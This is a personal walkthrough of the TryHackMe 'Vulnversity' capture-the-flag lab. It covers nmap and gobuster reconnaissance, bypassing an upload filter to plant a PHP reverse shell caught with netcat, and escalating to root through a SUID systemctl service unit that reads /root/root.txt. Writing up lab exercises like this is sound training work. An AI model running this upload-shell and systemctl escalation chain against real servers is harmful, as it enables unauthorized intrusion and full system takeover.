Posts Vulnversity - TryHackMe

Vulnversity - TryHackMe

Vulnversity from TryHackMe

Task 1 - Deploy the machine

deployment B), lezz go

Task 2 - Reconnaissance

  1. Scan this box: nmap -sV <machines ip>

    nmap scan results

  2. Scan the box, how many ports are open?


  3. What version of the squid proxy is running on the machine?


  4. How many ports will nmap scan if the flag -p-400 was used?


  5. Using the nmap flag -n what will it not resolve?


  6. What is the most likely operating system this machine is running?


  7. What port is the web server running on?


  8. Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

Task 3 - Locating directories using GoBuster

  1. Now lets run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>

    gobuster help

  2. What is the directory that has an upload form page?

    go gobuster



Task 4 - Compromise the webserver

  1. Try upload a few file types to the server, what common extension seems to be blocked?

    on uploading a .php file,

    hey not allowed

  2. To identify which extensions are not blocked, we’re going to fuzz the upload form. To do this, we’re doing to use BurpSuite. If you are unsure to what BurpSuite is, or how to set it up please complete our BurpSuite room first.

    sucks that the burpsuite room is only for subscribers

  3. Make a wordlist of different php extensions. Use burpsuite to send the upload POST request to intruder and add that dollar-like sign at appropriate places. Then start the attack.

     $ cat phpext_list.txt

    for some reason, the intruder’s sniper attack did not work for me i.e. gave the same response for all extensions. So, upon trying them manually, we get success for .phtml

  4. A reverse php shell is given here and change the value of the IP to your IP from the tun0 interface. Change the extension to .phtml. Listen on 1234 through netcat with the command nc -vlnp 1234. Then upload the shell file, navigate to the file by going to the file URL, http://$MACHINE_IP:3333/internal/uploads/php_rev_shell.phtml to make the machine execute your file.

    when we go to the URL,

    boom access

    now, we have spawned a shell

  5. What is the name of the user who manages the webserver?

    the home folders for users are created at /home/. ls /home/ shows us that a user, bill exists.

  6. What is the user flag?

    yea flag B)

Task 5 - Privilege Escalation

  1. intro to SUID. find all binaries with SUID.

    to find all such binaries, we can run find / -perm -4000 2>/dev/null

    • find to search

    • / to start from the topmost directory

    • -perm to specify permission value

    • -4000 to specify SUID permission value of exactly 4000

    • 2 > /dev/null to hide all the errors by redirecting stderr to null stream

    sweet suid

    /bin/systemctl is of importance here as you will see in the next question

  2. Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt)

    gtfobins is a curated list of unix binaries that can be used for privilege escalation

    this gtfobins article on systemctl tells us how to exploit it to run any command as superuser

    so taking inspiration from that, we can do this

     $ RFLAG=$(mktemp).service
     $ echo '[Service]
       ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/theFLAG"
       [Install]' > $RFLAG
     $ /bin/systemctl link $RFLAG
     $ /bin/systemctl enable --now $RFLAG

    then to view the flag, cat /tmp/theFLAG

    yea root flag B)

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